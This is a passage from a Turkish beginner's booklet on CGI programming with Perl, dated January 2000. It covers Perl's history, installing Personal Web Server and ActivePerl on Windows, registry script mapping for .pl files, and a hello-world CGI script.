CGI PERL Nedir

Document Sample
CGI PERL Nedir Powered By Docstoc
					Notlar:

   Giriş bölümünün sonunda, HTML-CGI İlişkisi başlıklı ikinci bölümün önünde, “Bir iki not” başlıklı
   bölümün ilk paragrafında, bu kitapçığın örnek kodlarını içeren cgiperl.zip adlı dosyanın PCW
   Sitesinde durduğu yerin adresi noktalarla boş bırakılmış bulunuyor. Arzu edilirse bu bilgi kapak
   içinde de tekrar edilebilir.

   Tashih yap(a)madım! VE herzamankinden daha çok daktilo hatası yaptığımı üzülerek görüyor ve
   elimde olmayan (veya sadece elimden kaynaklanan!) bu durum için son derece üzgün olduğumu
   belirtmek istiyorum.

   Altını çizmeyi unuttuğum İngilizce kelimelerin bold veya italik yapılması size emanet! Ve bunun için
   ayrıca şükranlar.

   Bu kitapçıkla birlikte CD Magazine’de veya sitede Windows ve MacOS için Perl programları
   verilebilir. WinPerl32’yi http://www.activestate.com ; MacPerl’ü ise
   www.iis.ee.ethz.ch/~neeri/machintosh/perl.html adreslerinde bulabilirsiniz. Linux? Onda Perl
   built-in var!

  Hakkı Öcal (26 Ocak 2000)
                                 CGI / PERL
Giriş ...................................................................................................................... 5

   Kişisel Web Server Kuralım....................................................................................... 7

   PWS Kurulurken Hata Verirse .................................................................................. 8

   Windows İçin Perl ..................................................................................................... 9

   ActivePerl’ü kurarken ............................................................................................. 10

   Daha fazla bilgi için ................................................................................................. 13

   Bir iki not ................................................................................................................. 13

HTML-CGI İlişkisi ................................................................................................ 15

   Çevre Değişkenleri .................................................................................................. 17

   “Shebang” nereye gitti! .......................................................................................... 18

   Yöntem Farkı: GET ve POST .................................................................................... 20CGI / Perl                                                                1
   Bilgi Yumağı ............................................................................................................. 20

   Yumağı açalım ......................................................................................................... 24

   İki önemli HTML etiketi .......................................................................................... 25

      <BASE> Etiketi ................................. 25

      <META> Etiketi ................................. 26

   İstemcinin İstekleri - Sunucunun Sundukları ......................................................... 27

   HTTP Statü Kodları: ................................................................................................. 28

   Çıktı Türleri ve Yer................................................................................................... 30

   Belli başlı MIME tür/alt-tür grupları ....................................................................... 31

   URI türleri ................................................................................................................ 33

   Diğer Başlıklar ......................................................................................................... 34

   Sonuç....................................................................................................................... 35

Perl’ün Yapı Taşları ............................................................................................ 36

   Perl’de Veri ............................................................................................................. 36

   Sabit Değerler, Değişkenler .................................................................................... 37

   Tekil Değişkenler, Listeler, Ekleme, Çıkartma ........................................................ 38

   Dizileri saydırmak.................................................................................................... 40

   Splice ve Split .......................................................................................................... 41

   Kolay liste!............................................................................................................... 43

   Özel Karakterlerin ‘Escape’ Durumu ...................................................................... 45

   Hash! veya İlişkili Diziler ......................................................................................... 46

   Mantıksal Sınama: if..Then Deyimi ........................................................................ 53

   Karşılaştırma Operatörleri ...................................................................................... 53

   Oku bakiim!............................................................................................................. 55

   Döngüler ................................................................................................................. 57
CGI / Perl                                                               2
   Tek Tırnak.. Çift Tırnak.. .......................................................................................... 60

   Metinleri birbirine Nokta ile ekleyebiliriz .............................................................. 61

Metin, Sayı ve Dosya İşlemleri........................................................................... 64

   Uzuuuuun metin ..................................................................................................... 66

   Metin Biçimlendirme .............................................................................................. 66

   Lower ve Upper Kasalar.......................................................................................... 67

   Biraz da Matematik ................................................................................................ 69

   ++’nin garip oyunu .................................................................................................. 70

   Perl’de Dosya İşlemleri ........................................................................................... 72

   Biraz Unix Bilgisi ...................................................................................................... 72

      Dosyayı Açalım! ................................ 73

   Path! ........................................................................................................................ 74

   Tutamak adı neden büyük harf! ............................................................................. 75

   Dosya Açamayan Perl Ölsün Mü? .......................................................................... 76

   Her sistemin kendi diline göre ............................................................................... 77

   Açtığınızı Kapatın! ................................................................................................... 78

   Dosyayı Okuyalım ................................................................................................... 78

   Dosyaya Yazdıralım ................................................................................................. 82

   Perl’de String Biçimlendirme.................................................................................. 83

   Yazdırmış olsa idik! ................................................................................................. 85

   Dosyaya Ek Yapalım ................................................................................................ 85

   Gerçek Form.. Gerçek Perl ..................................................................................... 86

      Bul-Değiştir ................................... 86

      Form’dan gelen bilgilerde arama-bulma-değiştirme90

CGI’da Yaşam ..................................................................................................... 98
CGI / Perl                                                                3
  CGI, Web Server’a Bağımlıdır ................................................................................. 98

  UNIX Dosya izinleri ................................................................................................. 99

  Server Güvenliği .................................................................................................... 100

  Server’da program çalıştırmak ............................................................................. 101

  Server ile FTP İlişkisi .............................................................................................. 102
CGI / Perl                                                            4
       Giriş


HTML ile uğraşmaya başladınız ve hemen bu dilin yetersizliklerini keşfettiniz. Bu eksikleri Javascript ile
gidermeye çalıştınız. Fakat halâ eksik bir şeyler var. Sayfalarınıza Form koyuyorsunuz, fakat “mailto:”
köprüsünden başka bir ACTION koyamıyorsunuz. Veya koyuyorsunuz da hep başkalarının yazdığı
programlara, Script’lere köprü veriyorsunuz. Çoğu zaman bu köprüler de işlemiyor.

CGI dünyasına hoşgeldiniz!

Eğer şu andaki planlarınızın arasında yeni bir dil öğrenmek yoksa, korkarım planlarınızı değiştireceksiniz.
Bir dil öğrenmeye çoktandır niyetli idiniz, fakat bir türlü dili belirleyemiyor idi iseniz, tebrikler, Perl
öğreniyorsunuz!

Hemen gözünüz korkmasın! Muhasebe veya kelime-işlemci bir program yazacak şekilde Perl öğrenmeye
kalkmayacağız. Zaten bu kadarcık bir kitapçıkla, Perl gibi bir dil öğrenilemez. Sadece CGI’a yetecek kadar
Perl öğreneceğiz. Bu, Web sitenize evsahipliği yapan Web Server’a “Filanca formdaki bilgileri al; şu
dosyaya ekle; sonra formu dolduran kişiyle elektronik mektup yollayarak teşekkür et vebana da durumu
bildir!” demeye yetecek kadar Perl demektir.

Perl, Internet bu kadar yaygın değilken, yani tarihin karanlık çağlarında (illâ bilmek istiyorsanız, 1986
yılında!), Larry Wall adında Unix işletim sistemi ile çalışan bir bilgisayar ağının yöneticisi tarafından,
hergün yaptığı işleri kolaylaştıracak bir makro dili olarak geliştirilmiş. Larry, sorumlu olduğu sistemin
kullanımı ve durumu ile ilgili yüzlerce raporu yazdırmak için komut istemci satırından aynı komutları
tek-tek girmekten bıkmış. Kendi kendine “Şu sisteme bütün bu komutları hergün tek tek vermektense
bir dosya olarak versem; ne kadar kolay olur!” demiş. Fakat o tarihte Larry’nin Unix’inde ve diğer Unix
türevlerinde bir çok programlama dili mevcut olduğu halde, “pratik,” bir yığın raporu alıp içinden gerekli
bilgileri “çeken” ve bunu “rapor” haline getiren bir dil yoktu. Larry, çaresiz kalan bütün bilgisayarcılar
gibi, oturdu, kendi programlama dilini kendisi yazdı! Ortaya çıkan dile, Practical Extraction and Report
Language (Pratik Çekme ve Rapor [etme] Dili) adı verildi. Tek işlevi vardı: Unix operatörünün çeşitli kayıt
(log) dosyalarından ihtiyacı olan bilgileri çekip, bir rapor biçimine sokarak, ya yeni dosyaya kaydetmek,
ya ekranda görüntülemek ya da yazıcıda yazdırmaktı.

Fakat ilk sürümünü paylaşanlar Perl’ü (ki ilk sürümünde adı bile yoktu!) o kadar sevdiler ki, 1988 Usenet
Konferansı’na katılanların kapış kapış paylaştığı tek şey Perl disketleri oldu. Perl’ün şöhreti Unix ile sınırlı
kalmadı; Microsoft firması NT, IBM ise OS/2 için sürümlerinin hazırlanmasına yardımcı oldular.
Netscape, Apache ve Microsoft Web Server programlarına Internet Client (istemci) programları
(Internet sitelerini ziyaret eden kişinin Browser’ı) tarafından gönderilecek bilgilerin işlenmesi gibi Web
Server’a bir dizi komut vermek vermek gerektiğinde kullanılacak Script (betik) dili aradıklarında
tereddütsüz Perl’e de yer verdiler. Perl bu amaçla kullanılabilecek diller arasında gerek kullanım
kolaylığı, gerekse Unix uzmanları tarafından zaten yaygın olarak kullanılması sebebiple ön sıraya geçti.
Şimdi 5’nci sürümüne ulaşmış bulunan Perl ile ilgili temel bilgiyi 200 küsur sayfalık “perl manpage”CGI / Perl                                               5
dosyasında bulabilirsiniz. Bu dosyayı indirebileceğiniz yerlerin başında
http://www.perl.com/perl/info/documentation.html#online adresi gelir. Ayrıca Usenet’te Perl’ün
gelişimi konusundaki şu Haber Gruplarına bakabilirsiniz:

news://comp.lang.perl.announce

news://comp.infosystems.www.authoring.cgi

Perl’ün bu denli tutulması ve Internet’te istemci ve sunucu sistemler (Browser ve Web Server) arasında
aracı olarak kullanılması bir kaç sebebe bağlanabilir. Bunların başında Perl’ün bir Script dili olması gelir:
yani Perl ile yazdığınız program, bir düz yazı dosyasıdır ve çalışabilmesi için bir yorumlayıcıya ihtiyaç
vardır. Derlenmemiştir; yani ortada bir .exe veya .com dosyası bulunmaz.

Şimdi biraz da CGI üzerinde duralım. Yukarıda CGI’ın, Internet istemcisi ile sunucusunun buluştuğu
nokta olduğunu belirttik. Bu noktaya Common Gateway Interface (Ortak Geçit Arayüzü) denir, çünkü
Web Server programı, istemci programdan (browser) kendisini çalıştıran bilgisayara gönderilen
komutlar için bir geçit noktasıdır. Sizin Web tasarımcısı olarak sözgelimi bir Form’daki bilgilerin alınıp,
bir dosyaya kaydedilmesi için vereceğiniz komutu, sitenizin bulunduğu bilgisayarın işletim sistemi icra
edecektir. Formunuzdaki bilgilerin alınıp, söz gelimi size elektronik mesaj olarak gönderilmesini
istiyorsanız, gerçekte sitenizin evsahibi olan bilgisayara, “E-mail programının mektup gönderme
bölümünü çalıştır da, şu mektubu gönder bakalım!” demiş oluyorsunuz. Bu komut icra taleplerinin,
Internet’ten (browser’dan) alınıp evsahibi bilgisayarın işletim sistemine aktarılması için bir ortak geçit
ve bu geçitte sizin bu komut taleplerinizi karşılayıp, işletim sistemine aktaracak bir ara-birim gerekir. Bu
arabirim, CGI’dır.

CGI programı dediğimiz şey ise Perl’le yazılabilir; C, Delphi, Visual Basic ile yazılabilir; yeter ki Web
Server bu programı çalıştırabilsin; programın vereceği komutları alıp, kendisinin de “üzerinde”
bulunduğu işletim sistemine iletebilsin.

<cgi-perl001.tif>

Bu ilişkileri daha iyi anlayabilmek için biraz daha yakından bakalım. Internet’te istemciler ve sunucular
vardır. İstemci (client), bir Internet Browser programıdır; bu program kullanıcı olarak bizim arzu
ettiğimiz Internet adresini bulmak ve bu adresteki HTML belgesini Browser penceresinde
görüntülemekle görevlidir. Internet dediğilmiz kablolar, uydular, Router’lar kümesinin nasıl çalıştığınızı
bildiğinizi varsayıyorum. Bu konuda birçok yerde, örneğin Byte Dergisinin Kasım 1998 sayısıyla birlikte
verilen Bir Web Sitesi Kuralım adlı kitapçıkta, gerekli bilgiyi bulabilirsiniz. Internet’in diğer ucunda
bulunan sunucu da tıpkı bizim Browser programımız gibi bir programdır; bir bilgisayarda çalışır ve o
bilgisayarda da tıpkı bizim istemci bilgisayarımız gibi bir işletim sistemi bulunur. Bizim istemci olarak
gönderdiğimiz talep, sunucuya ulaştığında neler olur? Önce Web Server programı, talebi inceler, taleple
birlikte kendisine gelen bir çok bilgiyi kaydedeceği bir ortam (Enivronment) oluşturur. Sonra talep
edilen HTML dosyasını kendi bilgisayarında bulur ve istemciye gönderir.
CGI / Perl                                               6
İstemci olarak her zaman “düz” bir HTML dosyası talep etmeyiz. Kimi zaman sözgelimi bir form’da
“Gönder” düğmesini tıklarız. HTML bilginizi yoklayın; genellikle bir Gönder düğmesi, ait olduğu Form
etiketinin ACTION bölümünde yazılı “komutu” harekete geçirir. Böyle bir “istem” halinde neler olur?
Bizim açımızdan farklı hiç bir şey olmaz: bizim Browser programımız tıpkı düz bir HTML talep ettiği gibi,
Formun bilgisini derler-toplar paketler Sunucu’ya gönderir. Gönderilen “şey” yine Internet denen
ortamdan geçer ve sunucuya ulaşır. Fakat bu kez sunucuda farklı işlemler olur:

<cgi-perl002.tif>

Sunucu, kendisine gelenleri inceler ve ikiye ayırır: Veriler ve komutlar. Veriler, bizim için o anda
oluşturulan ortamda kaydedilir; komutlar ise çalıştırılmak üzere işletim sistemine aktarılır. Web Server
programının çalıştığı işletim sistemi, kendisine Web Server tarafından iletilen “Şu komutu icra et
bakalım!” talebini inceler; ve gereğini yerine getirir. (Bu komut, “C: sürücüsündeki bütün bilgileri sil!”
bile olsa! Buna aşağıda döneceğiz.)

Bu anlamda CGI, istemcinin Web Server’a ve onun işletim sistemine “iş yaptırttığı” noktadır. CGI
programı, bu işleri belirten programdır. Perl, bu programları yazdığımız ve çağırdığımız programı
yazmakta kullandığımız bir dildir.

Perl ile çok iş yapılabilir. Fakat bu kitapçıkta biz Perl’ün sadece CGI’ı ilgilendirdiği kadarıyla ilgileneceğiz.
Başka bir deyişle bu kitapçık bir Perl kitapçığı değil, bir CGI kitapçıdır. İlgimiz dil olarak Perl’den çok
Perl’ün CGI’da nasıl kullanılacağına yönelik olacaktır. Dolayısıyla, önce uzun uzun CGI’ı tanıyacağız.
Bunun için Web Server’ın ne olduğuna ve nasıl çalıştığına bakacağız. Ve tabiî bu amaçla bir çok Perl
programı yazacağız.

Perl ile veya hangi dille yazılırsa yazılsın, CGI programı kendi başına iş yapmaz, Web Server’a o işin
yapılmasını bildirir. Başka bir deyişle Perl ile yazacağımız CGI programı aslında sadece Web Server’ı
“programlamaya” yarar. Kelime-işlem programınız için makro yazarken nasıl bu programın neler
yapabileceğini bilmek zorunda iseniz, CGI programı yazabilmek için de Web Server programını
tanımanız, imkan ve yeteneklerini, işletim sistemi ile nasıl etkileştiğini bilmeniz, dolayısıyla bir ölçüde de
olsa işletim sistemi tanımanız gerekir. Bu kitapçıkta bu bilgiler yer alıyor.

Kişisel Web Server Kuralım


Şimdi asıl mevzuya girmeden kısa bir hazırlık yapmamız gerekir. Diyelim ki bir CGI programı yazdık. Bu
programı Web Server’a gönderip, uygulamaya koymadan önce, kendi bilgisayarımızda denememiz
gerekmez mi? Fakat dedik ki, CGI programları Server için yazılır ve Server’da çalışır. Bugüne kadar
istemci olmaktan başka bir işlevi olmayan kendi bilgisayarımızda bu işi yapabilir miyiz? Evet yaparız;
yapmak zorundayız. Bir CGI programını gerçek Web Server’da, gerçek Internet’te denemeye kalkmak,
hem çok tehlikeli olabilir, hem de çok masraflı. Önce kendi istemci bilgisayarımızı, küçük bir sunucu
haline getirelim ve CGI programlarımızı kendi bilgisayarımızda deneyelim.
CGI / Perl                                                7
Perl, Unix dilidir; dolayısıyla herhangi bir Unix-türevi işletim sisteminde (örneğin Linux’ta) hiç bir şey
yapmaya gerek olmadan çalışır. NT işletim sistemiyle çalışan Web Server programları da Perl ile yazılmış
CGI programlarını çalıştırabilirler. Ücretsiz site yeri veren Web Evsahibi firmalar (Hosting şirketleri)
genellikle Unix-tabanlı sistemlere sahiptir. Fakat sizin evsahibiniz NT-tabanlı bir Web Server’a sahipse,
büyük bir ihtimalle sistemini Perl’ü tanıyacak ve çalıştırabilecek ekleri yapmıştır.

Yazacağımız CGI programlarını sınayacağınız kişisel bilgisayarınız Linux ile çalışıyorsa, muhtemelen bir
Web Server programı ya kurulmuştur; ya da elinizdeki Linux dağıtım CD-ROM’unda bunu yapmanızı
sağlayacak dosyalar vardır. Linux ile çalışan bilgisayarınıza Web Server programını kurduğunuz zaman
bu program Perl’ü anlar, yorumlar ve uygular; özel bir önlem almanız gerekmez.

Kişisel bilgisayarınız Windows 95, 98, NT4 WorkStation veya NT4 Server ile çalışıyorsa, sisteminize bir
Web Server programını siz kurmak zorundasınız. Windows 2000 Professional veya Windows 200 Server
ise Kişisel Web Server programını kendiliğinden kurar. Ancak bütün Windows sistemlerinde, kişisel Web
Server’ın Perl ile yazılmış CGI programını anlar hale gelmesini sağlamak size düşer. Şimdi kısaca bir
Windows sistemine kişisel Web Server kurma ve bu Server’ı Perl anlar hale getirme konusu üzerinde
duralım.

Windows 98’e bir kişisel Web Server kurmaya geçmeden önce bilgisayarımıza bir kimlik vermemiz
gerekir: Bilgisayarım/Denetim Masası/Ağ’ı tıklayarak açacağınız diyaloğ kutusunda ikinci sekme olan
Tanımlama’yı açın ve “Bilgisayar adı” kutusuna istediğiniz adı yazın. Bilgisayarın ağ ortamında olması
gerekmez. Sonra Win98 CD-ROM’unda Add-ons klasöründeki PWS dizininde Kur.exe’yi tıklayın. Aynı
işlemi NT için Option Pack CD-ROM’unu kullanarak da yapabilirsiniz. Option Pack CD-ROM’undaki
Default.htm’i açarsanız, bilgisayarınızın Windows 98 ile çalıştığını algılayacak olan program size Personal
(kişisel) Web Server (PWS) kurmayı önerecektir. NT4 Workstation veya NT4 Sevrer sistemlerine kişisel
Web Server olarak Internet Information Server (IIS) kurulmalıdır. NT Option Pack CD-ROM’unundaki
Default.htm’i açarsanız, program size IIS’ii kurmayı önerecektir. (NT4 sistemlerine IIS’i kurmadan önce,
Service Pack 3’ü uygulayın; Internet Explorer 5’i kurun. Elinizde varsa Service Pack 4, 5 veya 6’yı en son
uygulayın.)

//////////////////////KUTU//////////////////

PWS Kurulurken Hata Verirse


Windows 98’e PWS kurarken, programın Microsoft Transaction Server bölümüne ilişkin sistem kayıtları
yapılırken, iki hata mesajı ile karşılaşabilirsiniz (0x80004005 ve 0xfee662). Bu, orijinal Windows 98 CD-
ROM’undaki PWS Kur programının, Windows Registry dosyasının büyük olması halinde hata
vermesinden kaynaklanıyor. Böyle bir durumla karşılaşırsanız, Bilgisayarım/Denetim Masası/Program
Ekle Kaldır aracılığıyla, Personel Web Server’ı kaldırın. Bilgisayar kapanıp açıldıktan sonra, Windows 98
CD-ROM’unda Add-ons/PWS dizinindeki bütün dosyaları, sabit diskinizde Temp dizinine kopyalayın.
Sonra http://support.microsoft.com/support/kb/articles/q246/0/81.asp adresinde “Dowload
Mstsetup.dll” satırını tıklayın. Mssetup.exe adlı bir dosya bilgisayarınıza indirilince; bu dosyası iki kere
tıklayın ve dosyanın genişletileceği yer olarak C:\Temp’i gösterin; program Mstsetup.dll dosyasının


CGI / Perl                                             8
değiştirilmesini isteyip istemedğinizi sorduğu zaman “Tamam”ı tıklayın. Şimdi, C:\Temp’deki Kur.exe
(Windows CD-ROM’unuz İngilizce ise Setup.exe) programını iki kere tıklayın. PWS şimdi hatasız
kurulacaktır.

///////////////////KUTU BİTTİ//////////////////////////////

Windows 987e Kişisel Web Server kurulduğunda Masaüstü’nde Yayınla (Publish) adlı bir simge
belirecektir. NT sistemlerinde ise Başlat menüsünde Programlar bölümüne IIS Manager satırı eklenir. Bu
yollardan biriyle PWS veya IIS’i çalıştırın; Kişisel Web Server Yönetici penceresi açılacaktır. Soldaki araç
çubuğunda Yönetici’nin çeşitli bölümlerine gitmeniz gerekli gezinme simgeleri var. Şimdi, açılan ana
pencerede iki unsura dikkat edin:

<cgi-perl003.tif>

1. Kişisel Web Server’ınızın adı. Bilgisayarınızın adı buraya Server adı olarak yazılmış olmalı. Biraz sonra,
Internet’e koymadan önce sınayacağımız CGI programlarını içeren HTML sayfalarını çağırırken,
Browser’ın adres kutusuna burada gördüğümüz adı yazacağız.

2. Kişisel Web Server’ın bilgisayarımızda sabit diskteki gerçek adresi. Bu, sizin Kişisel Web Server’ınızın
kök (root) dizinidir. Bu genellikle C:\inetpub\wwwroot klasörüdür. Kişisel Web sitesi yaparsanız, sitenin
gerektirdiği bütün dizinleriniz ve dosyalarınız burada gördüğünüz dizinin içinde olmalıdır. Yapacağımız
CGI dosyalarını işte bu dizinin içine koyacağız.

Bunları bir kenara not ettikten sonra, soldaki araç çubuğunda Gelişmiş simgesini tıklayın; ortadaki
pencerede sanal dizinlerinizi görüyorsunuz. Bunlardan Home’u seçin ve sağdaki “Özellikleri düzenle”
düğmesini tıklayın.

<cgi-perl004.tif>

Ana dizinin okuma, yürütme ve makro erişim haklarının işaretli olmasına dikkat edin. İlerde kendinize
Kişisel Web Server’ınızın kök dizininde yeni bir dizin oluşturursanız (örneğin “resimler” gibi) ve içine
sitenizle ilgili dosyalar koyarsanız, Gelişmiş penceresinde Ekle düğmesini tıklayarak bu gerçek dizini de
sitenin sanal dizinlerinden biri haline getirmeniz gerekir. Gerçek dizinin adı XYZ bile olsa, sanal dizin
haline getirirken istediğiniz sanal adı verebilirsiniz. Ama unutmayın, Browser’ın adres hanesine gerçek
dizin adını değil sanal dizin adını yazmanız gerekir.

Bu işlemleri IIS’te değişik görüntülerle, fakat temel ilkeler itibariyle aynı şekilde yapabilirsiniz.

Windows İçin Perl


Şimdi sıra geldi Windows ortamını Perl’den anlar hale getirmeye! Bunun için Internet’ten ActivePerl’ü
indirmek veya ActiveState firmasından CD-ROM ısmarlamak zorundayız. Her iki işlem için de
http://www.activestate.com adresine gitmemiz gerekir. ActiveState sitesinden ActivePerl’ün son
sürümünü indirin ve bilgisayarınıza kurun. Windows 95 kullanıcıları, sistemlerinde Perl programlarınıCGI / Perl                                               9
çalıştırabilmek için sistemlerinin DCOM bileşenlerini güncelleştirmek için Microsoft’un sitesinden bazı
dosyaları indirmek zorundalar. Bu güncelleştirme için dosyaları
http://www.microsoft.com/com/resources/downloads.asp adresinde bulabilirsiniz. (Distributed
Component Object Model (DCOM), Windows’un ağda güvenli ve etkin bir tarzda yazılım bileşeni
dağıtma teknolojisidir. Eski adıyla "Network OLE," olan DCOM, HTTP dahil, bütün ağ dağıtım ve
ulaştırma protokolleri ile uyumludur ve kendi bilgisayarımızda Perl programlarını sınamak için bile olsa
Windows açısından gereklidir.)

/////////////////KUTU/////////////

ActivePerl’ü kurarken


ActiveState’in bu kitapçığı yazarken 5.22 sürümüne ulaşmış olan ActivePerl programının kuruluşu
sırasında bazı hata mesajları ile karşılaşmak mümkündür. 102, 104, 105, 112 veya 301 sayılı hata
mesajlarını alırsanız, bilgisayarınızı kapatıp, açın ve ActivePerl’ü kurmadan önce herhangi bir 16-bit
program çalıştırmayın. Sorunu bu yöntemle çözemezseniz, http://support.installshield.com/kb
adresinde Q100198 sayılı yaardım dosyasını indirerek, önerileri sırasıyla uygulayın.

ActivePerl’ün kurulumununsonuna doğru “Cannot Craeta Perl Interpreter” mesajını alırsanız,
muhtemelen daha önce kurulmuş eski sürüm ActivePerl ile çatışma var demektir. Bu durumda ya eski
ActivePerl’ü kaldırır ve klasörlerini silemeniz ya da yeni sürüm ActivePerl’ü yeni bir klasöre kurmanız
gerekir.

ActivePerl’ü adında boşluk olan dizine kurmayın. ActivePerl’ün işlemesi için gerekli bazı programlar,
adında boşluk olan dizinleri göremezler. ActivePerl’ün Kur programının önerdiği varsayılan dizini kabul
etmek doğru olur. Ayrıca Kur programının Autoexec.bat ve config,sys dosyalarında yapmayı önerdiği
değişiklikleri yapmasına izin verin.

Kurma ve diğer sorunlarla ilgili olarak ActiveState’in sitesindeki FAQ (Sıkça sorulan Sorular) dosyalarına
başvurabilirsiniz. Özellikle http://www.activestate.com/ActivePerl/docs/perl-
win32/perlwin32faq4.html sayfasında Windows sistemleriyle ilgili geniş bilgi bulabilirsiniz.

//////////////////KUTU BİTTİ///////////////////

ActivePerl’ü kurduktan sonra, küçük bir işlemle, PWS veya IIS’i, uzatması .pl olan dosyaları
görüntülenmesi için Perl.exe programını çalıştırmak üzere ayarlamanız gerekir. Bu ayar, Windows’un
kayıt dosyasını (Regitry) düzenlemeyi gerektiriyor. Kayıt dosyası, Windows 95/98/NT/2000 sistemlerinin
düzgün çalışması için gereklidir; bu dosyada yapılacak bir yanlışlık sistemin tümünü çalışmaz hale
getirebilir. Aşağıdaki işlemleri yapmaya başlamadan önce Registry’nin yedeğini almak ve bunu bir
diskette saklamlak gerekir. Buna rağmen çalışırken çok dikkatli olmanızı salık veririm.

Şimdi önce Perl.exe’nin yol bilgisini (Path) bir kenara yazın: örneğin c\Perl\bin\perl exe); ve PWS’i
durdurun. Sonra 95/98’de Regedit.exe, NT’de Regedt32.exe programını çalıştırın. Soldaki dizide altı
ana-kayıt bölümü göreceksiniz. Bunlardan HKEY_LOCAL_MACHINE’nin önündeki artı işaretini tıklayın.


CGI / Perl                                            10
 Açılacak listede SYSTEM’i bulun ve önündeki artıyı tıklayın. Açılacak listede CurrentControlSet’i bulun;
 önündeki artıyı tıklayın. Açılacak listede Services satırını bulun ve önündeki artıyı tıklayın; yeni listede
 W3SVC satırının önündeki artıyı, sonra Parameter satırının önündeki artıyı tıklayın. Şimdi, açılacak
 lisdede ScriptMap satırını tıklayın. Sağda, “Varsayılan...(değer atanmamış)” satırını görüyor musunuz?
 Güzel. Şimdi, Düzen menüsünü tıklayın, açılacak listede Yeni, açılacak alt-listede Dize Değeri maddesini
 seçin. Sağda, “Varsayılan...” satırının altında “Yeni Değer #1” adlı bir satır oluşacak ve bu kelimeler
 seçilecektir. Klavyede “.pl” yazın (Nokta işareti, p ve l harfleri). Sonra kKlavyede iki kere Enter’a basın;
 açılacak Dize Düzenle kutusunda “Değer verisi” hanesine kendi sisteminize uygun olan Perl’ün sabit
 diskteki yol bilgisini (Path) ile birlikte “%s %s” yazın. Örneğin:

     c:\Perl\bin\perl.exe %s %s

 Burada “%s” yazarken s harfinin küçük harf olmasına dikkat edin; büyük S yazarsanız Perl çalışmaz. Bu
 bilgiyi girdikten sonra Dize Değeri kutusunun Tamam düğmesini tıklayın. Aynen şu görünümü elde etmiş
 olmalısınız:

 <cgi-perl005.tif>

 Bu işlem sırasında Dize adını verirken hata yaparsanız, örneğin .pl yerine pl veya .pp yazarsanız, bu
 kelimeyi sağ tıklayın ve açılan menüden Yeniden Adlandır maddesini seçin. Dize değerini yazarken hata
 yaparsanız, yine .pl’i sağ tıklayın ve açılan menüden Değiştir maddesini seçin. (Eğer ActivePerl’ün
 varsayılan değerlerini değiştirmediyseniz, Perl dizininin adının büyük harfle, “bin” dizininin ve
 programın adının küçük harfle başladığına dikkat edin. %s iki kere kere yazılıyor ve ikisinde de s harfi
 küçük!)

 Regedit’i kapatın. Bilgisayarı kapatıp, açın ve PWS’i başlatın. Şimdi PWS’ınız Perlce bilir hale gelmiş
 olmalı!

 Aynı işlemi NT’de IIS için yapacaksanız, IIS Manager’da Default Web Server’ı durdurun. Regedt32.exe’yi
 çalıştırdığınızda ve HKEY_LOCAL_MACHINE\
 SYSTEM\CurrentControlSet\Services\W3SVC\Parameter\ScriptMap’i bulunca Edit menüsünden Add
 Value maddesini tıklayın. Value Name olarak .pl yazın. Data Type olarak Reg_SZ’i seçin ve String Value
 olarak perl.exe’nin tam Path’ ile perl.exe %s %s yazın. Örneğin:

     c:\Perl\bin\perl.exe %s %s

 Regedt32’yi kapatın; IIS Manager’dan Default Web Server’ı çalıştırın. Şimdi sizin NT sisteminiz de Perl
 anlar hale gelmiş olacak.

 Ama her iki durumda sistemi sınamak gerekir. Bunun için Not Defterini açıp, şunları yazın:

print "HTTP/1.0 200 OK\n";

print "Content-Type: text/html\n\n";
 CGI / Perl                                             11
print "<HTML>\n";

print "<HEAD>\n";

print "<TITLE>MERHABA DÜNYA</TITLE>\n";

print "<meta http-equiv=\"content-type\" content=\"text/html; charset=ISO-8859-9\">\n";

print "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1254\">\n";

print "</HEAD>\n";

print "<BODY>\n";

print "<H4>Merhaba Dünya</H4>\n";

print "<P>\n";

print "IP adresiniz: $ENV{REMOTE_ADDR}.\n";

print "<P>\n";

print "<H5>Başarılar dileriz!</H5>\n";

print "</BODY>\n";

print "</HTML>\n"; Bu dosyayı merhaba.pl adıyla, PWS’ın kök (root) dizinine kaydedin. Browser’ınızı açın ve adres hanesine
 kişisel Web Server’ınızın adresi ile birlikte dosyanın adını yazın. Örneğin: http://server/merhaba.pl

 <cgi-perl006.tif>

 Tebrikler! Bir taşla kaç kuş birden vurdunuz. Ve en önemlisi, ilk CGI programınıza “Merhaba Dünya!”
 yazdırarak, bir geleneği korumuş oldunuz. İlk Perl programımızı yazmış olduk; gerçi şu anda
 yazdıklarımızın ne işe yaradığını pek bilmiyoruz, ama yukarıda belirttiiğimiz gibi bu programla Server’a
 bir “iş” yaptırıyoruz. Bu iş, ana hatlarıyla, bir HTML sayfası oluşturmak ve bunu talep eden istemciye
 göndermesini sağlamaktan ibadet. Kodumuza dikkatle bakarsanız bu işin bölümlerini görebilirsiniz; ama
 şimdilik bu ayrıntıların üzerinde durmayalım.

 Burada önemli olan, Windows sistemimizi Unix’e ait bir dili anlar hale getirmiş ve bunu kurduğumuz
 kişisel Web Server’ımıza tanıtmış olmamız.

 Şimdi kolları sıvayıp, CGI için Perl öğrenmeye başlayabiliriz. Ama isterseniz bu işlemi bir kere de “.cgi”
 uzatması için yapabilirsiniz. Perl program dosyalarını “.cgi” uzatmasıyla kaydetmek yaygın bir
 uygulamadır; böyle bir örnekle karşılaştığınız ve uyguladığınız zaman kişisel Web Server’ınızın hata
 vermesini önlemiş olursunuz.
 CGI / Perl                                             12
Daha fazla bilgi için


Bu kitapçıktaki Perl, metin ve HTML örneklerini, PCWorld-Türkiye dergisinin Web Sitesinden,
......................................./cgiperl.zip dosyasını indirerek edinebilirsiniz. Bu dosyayı indirseniz bile,
aşağıda vereceğimiz Perl örneklerini kendiniz yazmalısınız; Perl bilmenin bir şartı fonksiyonları
tanımaksa, diğer şartı Perl’ün yazım kurallarını iyice öğrenmektir.

CGI programı olarak herhangi bir dille yazdığınız uygun bir çalıştırılabilir dosya (dosya adı uzatması
“.exe” veya “.com” olan bir Executable’ı) kullanabilirsiniz. Fakat bu kitapçıkta, aksini belirtmediğim
taktirde CGI programı dediğim zaman bir Perl dosyasını kastediyorum.

Bu kitapçıkta yeri geldikçe HTML konusunda da bilgiler bulacaksınız; bununla birlikte HTML’i bir dil
olarak bildiğinizi varsayıyoruz. Bu konuda eksiğiniz varsa, Byte Dergisinin Ekim 1998’de verdiği Internet
Tasarım Rehberi kitapçığına veya Internet’te bulabileceğiniz bir çok on-line HTML kurs malzemesine
(örneğin http://www.webteknikleri.com) başvurabilirsiniz.

Bir iki not


